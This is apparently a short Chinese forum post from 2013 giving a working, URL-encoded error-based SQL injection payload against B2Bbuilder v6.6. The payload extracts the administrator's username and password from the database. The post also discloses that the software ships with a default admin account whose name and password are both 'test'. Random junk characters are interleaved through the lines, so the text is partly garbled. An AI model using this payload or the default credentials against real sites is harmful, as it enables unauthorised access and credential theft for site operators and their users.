测试的程序版本为:B2Bbuilder_v6.6
8 w1 T, y+ x! q. X4 ?7 n' j7 M1 G" a! I) D
S' l, {/ e3 I% ]( B
http://www.site.com/?m=offer& ... m%28select+count%28*%29%2Cconcat%28%28
/ W- T# T4 T7 n7 Yselect+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.user,0x27,password# S4 P% E7 U+ O- H8 p& C
%2C0x27%2C0x7e%29+from+%60b2bbuilder%60.b2bbuilder_admin+Order+by+user+limit+0%2C1
$ K+ D" |8 G- m9 b% H0 v4 W$ q ^" |%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29% p) {/ j2 V" v p2 p2 u8 I2 B! K
*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1
7 \3 b' \% k4 h- \0 P( E & |6 T4 ?( L3 C1 Y2 b- e
这个B2B程序还有一个默认的管理员帐号,帐号密码都是test' D4 D. }/ f2 s2 g0 t
4 o. T) m. X4 b: Y: o: n$ v
|
发表于 2013-7-26 12:44:48
收藏
支持
反对